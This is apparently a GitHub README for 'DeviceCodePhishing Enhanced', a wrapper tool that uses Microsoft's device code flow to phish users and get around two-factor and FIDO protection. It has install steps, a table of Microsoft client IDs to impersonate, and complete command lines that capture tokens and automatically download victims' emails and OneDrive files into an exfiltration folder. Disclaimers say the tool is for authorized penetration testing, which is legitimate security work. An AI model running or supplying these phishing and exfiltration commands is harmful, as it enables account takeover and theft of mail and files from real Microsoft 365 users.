DeviceCodePhishing Enhanced

DISCLAIMER: This tool is for educational and authorized penetration testing purposes only. Unauthorized usage is strictly discouraged and may be illegal.

Description

DeviceCodePhishing Enhanced is an advanced phishing tool that leverages the Device Code Flow to bypass two-factor authentication, including FIDO protection. This wrapper version includes additional features for data exfiltration and comprehensive reporting.

NB: I added a DeviceCodePhishing OLD version in the repository (v1.0.1). For information about the releases, please visit this repository: https://github.com/denniskniep/DeviceCodePhishing/releases.

Features

• script_DeviceCodePhishing: A wrapper working with the DeviceCodePhishing binary.

Installation

Prerequisites

• Go 1.23+ (required for compilation)
• Python 3.x (required for my wrapper)
• Tested on Linux environment

Go Installation

If you don't have Go 1.23+ installed and want to build your own DeviceCodePhishing version, go is required:

Go is not required if you are happy with the provided binary, however, building binary is a good thing to do

# Download and install Go 1.23.4+
https://go.dev/dl/

sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf go1.23.4.linux-amd64.tar.gz

# Add to PATH (add to ~/.bashrc or ~/.zshrc)
export PATH=$PATH:/usr/local/go/bin
source ~/.bashrc  # or ~/.zshrc

Binary Installation

Option 1: Download Pre-built Binary

# Download from releases
# Go to github repository and releases
https://github.com/denniskniep/DeviceCodePhishing
# Then, download the release 1.0.1

chmod +x DeviceCodePhishing-linux-amd64
# Put the binary, renamed DeviceCodePhishing, in /usr/local/bin
sudo mv DeviceCodePhishing-linux-amd64 /usr/local/bin/DeviceCodePhishing

Option 2: Compile from Source

# Clone the repository
git clone https://github.com/denniskniep/DeviceCodePhishing.git
cd DeviceCodePhishing

# Compile the binary
go build -o DeviceCodePhishing .

# Install system-wide
sudo cp DeviceCodePhishing /usr/local/bin/DeviceCodePhishing

Python Wrapper Installation

The Python wrapper (script_DeviceCodePhishing.py) automatically looks for the DeviceCodePhishing binary in the following order:

1. /usr/local/bin/DeviceCodePhishing (system installation)
2. Current directory ./DeviceCodePhishing
3. System PATH

You maybe need to install requests

# Install Python dependencies
pip3 install requests

Development & Compilation

Making Changes

If you modify the source code in the DeviceCodePhishing/ directory:

1. Navigate to the project directory:

   cd DeviceCodePhishing/

2. Update dependencies (if needed):

   go mod tidy

3. Compile the project:

   go build -o DeviceCodePhishing .

4. Update system binary (recommended):

   sudo cp DeviceCodePhishing /usr/local/bin/DeviceCodePhishing

5. Verify changes:

   DeviceCodePhishing server --help

Project Structure

DeviceCodePhishing/
├── cmd/                  # Command-line interface
│   ├── root.go           # Root command
│   └── server.go         # Server implementation
├── pkg/                  # Core packages
│   ├── entra/            # Azure Entra ID integration
│   └── utils/            # Utility functions
├── main.go               # Main entry point
├── go.mod                # Go module definition
└── go.sum                # Go module checksums

Usage Examples

Basic Usage

# Start the phishing server with default settings
python3 script_DeviceCodePhishing.py

Advanced Configuration

Microsoft Outlook Targeting

python3 script_DeviceCodePhishing.py \
  --address ":8080" \
  --client-id "d3590ed6-52b3-4102-aeff-aad2292ab01c" \
  --tenant "common" \
  --output-file "tokens.txt" \
  --report-file "rapport_outlook.json" \
  --download-emails 100 \
  --output-dir "./demo_exfiltration" \
  --auto \
  --verbose

OneDrive Sync Engine Targeting

python3 script_DeviceCodePhishing.py \
  --address ":8080" \
  --client-id "ab9b8c07-8f02-4f72-87fa-80105867a763" \
  --tenant "common" \
  --output-file "tokens.txt" \
  --report-file "rapport_onedrive.json" \
  --download-emails 50 \
  --download-files \
  --output-dir "./demo_exfiltration" \
  --auto \
  --verbose

Azure CLI Targeting

python3 script_DeviceCodePhishing.py \
  --address ":8080" \
  --client-id "04b07795-8ddb-461a-bbee-02f9e1bf7b46" \
  --tenant "common" \
  --output-file "tokens.txt" \
  --report-file "rapport_azurecli.json" \
  --download-emails 100 \
  --download-files \
  --output-dir "./demo_exfiltration" \
  --auto \
  --verbose

Microsoft Teams Targeting

python3 script_DeviceCodePhishing.py \
  --address ":8080" \
  --client-id "1fec8e78-bce4-4aaf-ab1b-5451cc387264" \
  --tenant "common" \
  --output-file "tokens.txt" \
  --report-file "rapport_teams.json" \
  --download-emails 50 \
  --output-dir "./demo_exfiltration" \
  --auto \
  --verbose

Available Client IDs

Client ID	Application	Description	Use Case
d3590ed6-52b3-4102-aeff-aad2292ab01c	Microsoft Office	Office 365 applications	Email, documents access
ab9b8c07-8f02-4f72-87fa-80105867a763	OneDrive Sync Engine	File synchronization	File system access
04b07795-8ddb-461a-bbee-02f9e1bf7b46	Azure CLI	Command-line interface	Administrative access
1fec8e78-bce4-4aaf-ab1b-5451cc387264	Microsoft Teams	Communication platform	Chat, files, meetings
29d9ed98-a469-4536-ade2-f981bc1d605e	Authentication Broker	Default broker	General authentication

Command Line Options

  --address string          Server listening address (default ":8080")
  --client-id string        OAuth client ID to impersonate
  --tenant string           Azure tenant (default "common")
  --scope string            OAuth scope (default "https://graph.microsoft.com/.default")
  --user-agent string       Custom user agent string
  --output-file string      File to save tokens
  --report-file string      JSON report output file
  --download-emails int     Number of emails to download (default 50)
  --download-files          Download OneDrive files
  --output-dir string       Directory for downloaded data (default "./exfiltrated_data")
  --auto                    Auto-execute Microsoft Graph calls (after ctrl+c the server)
  --verbose                 Enable verbose logging
  --no-banner               Disable banner display
  --dry-run                 Show command without executing

Troubleshooting

Binary Not Found

If you get "DeviceCodePhishing command not found":

# Check if binary exists
ls -la /usr/local/bin/DeviceCodePhishing

# If not found, reinstall
sudo cp ./DeviceCodePhishing /usr/local/bin/DeviceCodePhishing
chmod +x /usr/local/bin/DeviceCodePhishing

Compilation Errors

If you encounter Go compilation errors:

# Check Go version (requires 1.23+)
go version

# Clean module cache
go clean -modcache

# Update dependencies
go mod tidy

# Rebuild
go build -o DeviceCodePhishing .

Permission Issues

# Fix permissions for the binary
sudo chown root:root /usr/local/bin/DeviceCodePhishing
sudo chmod 755 /usr/local/bin/DeviceCodePhishing

Security Considerations

• Educational Use Only: This tool is designed for authorized penetration testing and security research
• Legal Compliance: Ensure you have proper authorization before testing
• Responsible Disclosure: Report vulnerabilities through appropriate channels
• Data Protection: Handle collected data according to privacy regulations

Contributing

1. Fork the repository
2. Create a feature branch
3. Make your changes
4. Test thoroughly
5. Submit a pull request

License

This project is licensed under the MIT License - see the LICENSE file for details.

Acknowledgments

• Based on the original DeviceCodePhishing by Dennis Kniep
• Research on Family of Client IDs by Secureworks
• Microsoft Graph API documentation and security research community

Related Projects

• TokenTactics - Azure JWT manipulation
• GraphRunner - Microsoft Graph enumeration
• AADInternals - Azure AD security tools